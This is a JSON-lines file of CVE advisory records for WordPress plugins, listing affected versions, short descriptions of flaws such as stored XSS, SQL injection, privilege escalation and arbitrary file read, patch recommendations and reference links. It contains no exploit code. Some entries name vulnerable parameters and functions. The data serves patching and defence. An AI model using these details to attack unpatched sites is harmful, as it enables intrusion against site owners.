{"CVE_ID":"CVE-2024-13666","slug":"fluentform","versionImpact":"5.2.12","versionEndExcluding":"6.0.0","description":"The Fluent Forms \u2013 Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 5.2.12 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers spoof their IP address and submit forms that may have IP-based restrictions.","recommendation":"Update to version 6.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3258647%40fluentform%2Ftrunk&old=3242624%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3258647%40fluentform%2Ftrunk&old=3242624%40fluentform%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fe8e4-e27a-4492-b175-3b0846e4cf10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e06fe8e4-e27a-4492-b175-3b0846e4cf10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13610","slug":"simple-social-buttons","versionImpact":"5.4.0","versionEndExcluding":"6.0.0","description":"The Simple Social Media Share Buttons  WordPress plugin before 6.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85229528-1110-4d45-b972-8bbcba003a1f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47599","slug":"file-manager","versionImpact":"5.2.7","versionEndExcluding":"6.0","description":"Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager \u2013 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager.This issue affects File Manager \u2013 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n\/a through 5.2.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/file-manager\\\/wordpress-bit-file-manager-100-free-file-manager-for-wordpress-plugin-5-2-7-php-object-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/file-manager\\\/wordpress-bit-file-manager-100-free-file-manager-for-wordpress-plugin-5-2-7-php-object-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2470","slug":"sf-booking","versionImpact":"5.1","versionEndExcluding":"6.0","description":"The Service Finder Bookings plugin for WordPress, used by the Service Finder - Directory and Job Board WordPress Theme, is vulnerable to privilege escalation in all versions up to, and including, 5.1. This is due to a lack of restriction on user role in the 'nsl_registration_store_extra_input' function. This makes it possible for unauthenticated attackers to register an account on the site with an arbitrary role, including Administrator, when registering via a social login. The Nextend Social Login plugin must be installed and configured to exploit the vulnerability.","recommendation":"Update to version 6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1f62cda-262b-46d9-a839-0a573813cfa1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1f62cda-262b-46d9-a839-0a573813cfa1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11379","slug":"threewp-broadcast","versionImpact":"51.01","versionEndExcluding":"51.02","description":"The Broadcast plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'do_check' parameter in all versions up to, and including, 51.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations.","recommendation":"Update to version 51.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200309\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200309\\\/threewp-broadcast\\\/trunk\\\/src\\\/maintenance\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25213","slug":"advanced-access-manager","versionEndExcluding":"5.9.9","description":"The Advanced Access Manager plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read in versions up to, and including, 5.9.8.1 due to insufficient validation on the aam-media parameter. This allows unauthenticated attackers to read any file on the server, including sensitive files such as wp-config.php","recommendation":"Update to version 5.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e0f0df-7be2-4e18-988c-2cc558768eff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2098838\\\/advanced-access-manager\\\/trunk\\\/application\\\/Core\\\/Media.php?old=2151316&old_path=advanced-access-manager%2Ftrunk%2Fapplication%2FCore%2FMedia.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2098838\\\/advanced-access-manager\\\/trunk\\\/application\\\/Core\\\/Media.php?old=2151316&old_path=advanced-access-manager%2Ftrunk%2Fapplication%2FCore%2FMedia.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0954","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.7","versionEndExcluding":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting through editing context via the 'data-eael-wrapper-link' wrapper in all versions up to, and including, 5.9.7 due to insufficient input sanitization and output escaping on user supplied protocols. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029928\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/assets\\\/front-end\\\/js\\\/view\\\/wrapper-link.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029928\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/assets\\\/front-end\\\/js\\\/view\\\/wrapper-link.js\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24659","slug":"wpdm-premium-packages","versionImpact":"5.9.6","versionEndExcluding":"5.9.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WordPress Download Manager Premium Packages allows Blind SQL Injection. This issue affects Premium Packages: from n\/a through 5.9.6.","recommendation":"Update to version 5.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpdm-premium-packages\\\/vulnerability\\\/wordpress-premium-packages-sell-digital-products-securely-plugin-5-9-6-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpdm-premium-packages\\\/vulnerability\\\/wordpress-premium-packages-sell-digital-products-securely-plugin-5-9-6-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6977","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.5.4","versionEndExcluding":"5.9.5.5","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018pm_get_messenger_notification\u2019 function in all versions up to, and including, 5.9.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a logged-in user into performing an action such as clicking on a link.","recommendation":"Update to version 5.9.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1322\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1329\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/class-profile-magic-public.php#L1330\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3324676\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3324676\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/addf264e-e23c-4bb6-a898-0fbb4ec28189?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/addf264e-e23c-4bb6-a898-0fbb4ec28189?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-4704","slug":"contact-form-7","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Contact Form 7 WordPress plugin before 5.9.5 has an open redirect that allows an attacker to utilize a false URL and redirect to the URL of their choosing.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bdcdb5a-9026-4157-8592-345df8fb1a17\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bdcdb5a-9026-4157-8592-345df8fb1a17\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0586","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login\/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Login_Register.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Login_Register.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0585","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022852\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.5\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1376","slug":"event-post","versionImpact":"5.9.4","versionEndExcluding":"5.9.5","description":"The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing capability check on the save_bulkdatas function in all versions up to, and including, 5.9.4. This makes it possible for authenticated attackers, with subscriber access or higher, to update post_meta_data.","recommendation":"Update to version 5.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926c09d5-3824-4745-99f6-50d9c945d252?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926c09d5-3824-4745-99f6-50d9c945d252?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086840\\\/event-post\\\/trunk\\\/eventpost.php?old=3060317&old_path=event-post%2Ftrunk%2Feventpost.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086840\\\/event-post\\\/trunk\\\/eventpost.php?old=3060317&old_path=event-post%2Ftrunk%2Feventpost.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0723","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.7","versionEndExcluding":"5.9.4.8","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to blind and time-based SQL Injections via the rid and search parameters in all versions up to, and including, 5.9.4.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.9.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-chat-system.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-chat-system.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-request.php#L2379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-request.php#L2379\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140fa6e8-4381-4df2-af62-44d40b116daf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140fa6e8-4381-4df2-af62-44d40b116daf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0724","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.5","versionEndExcluding":"5.9.4.6","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.9.4.5 via deserialization of untrusted input in the get_user_meta_fields_html function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 5.9.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-html-generator.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/includes\\\/class-profile-magic-html-generator.php#L259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bb1de69-7bc2-4785-9789-0a2d1cf35b9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bb1de69-7bc2-4785-9789-0a2d1cf35b9b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1408","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.4","versionEndExcluding":"5.9.4.5","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_decline_join_group_request and pm_approve_join_group_request functions in all versions up to, and including, 5.9.4.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to approve or decline join group requests, which should normally be available to administrators only.","recommendation":"Update to version 5.9.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3306\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.3\\\/public\\\/class-profile-magic-public.php#L3306\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641f7727-83ba-45c2-b3e1-1ce19f86eac7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/641f7727-83ba-45c2-b3e1-1ce19f86eac7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13740","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.2","versionEndExcluding":"5.9.4.3","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.9.4.2 via the pm_messenger_show_messages function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read private conversations of other users.","recommendation":"Update to version 5.9.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1299\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a1b1a4-df72-4666-b116-882af4cd5796?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a1b1a4-df72-4666-b116-882af4cd5796?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13741","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.4.2","versionEndExcluding":"5.9.4.3","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Limited Server-Side Request Forgery in all versions up to, and including, 5.9.4.2 via the pm_upload_image function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to download and view images, as well as validating if a non-image file exists, both on local or remote hosts.","recommendation":"Update to version 5.9.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1717\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/class-profile-magic-public.php#L1717\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/partials\\\/crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.9.4.2\\\/public\\\/partials\\\/crop.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95d2a05d-67ae-45b1-8add-0dcf73d43181?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95d2a05d-67ae-45b1-8add-0dcf73d43181?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10900","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.9.3.6","versionEndExcluding":"5.9.3.7","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_remove_file_attachment() function in all versions up to, and including, 5.9.3.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary user meta, which can do things like deny an administrator's access to their site.","recommendation":"Update to version 5.9.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0e5fcfa-ebc9-45f6-9cbc-c9e3540baa6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0e5fcfa-ebc9-45f6-9cbc-c9e3540baa6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1902\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/admin\\\/class-profile-magic-admin.php#L1902\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190069%40profilegrid-user-profiles-groups-and-communities&new=3190069%40profilegrid-user-profiles-groups-and-communities&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190069%40profilegrid-user-profiles-groups-and-communities&new=3190069%40profilegrid-user-profiles-groups-and-communities&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6526","slug":"meta-box","versionImpact":"5.9.2","versionEndExcluding":"5.9.3","description":"The Meta Box \u2013 WordPress Custom Fields Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom post meta values displayed through the plugin's shortcode in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a6bfc87-6135-4d49-baa2-e8e6291148dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a6bfc87-6135-4d49-baa2-e8e6291148dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030376%40meta-box&new=3030376%40meta-box&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030376%40meta-box&new=3030376%40meta-box&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5189","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.23","versionEndExcluding":"5.9.24","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_js\u2019 parameter in all versions up to, and including, 5.9.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.24, or a newer patched 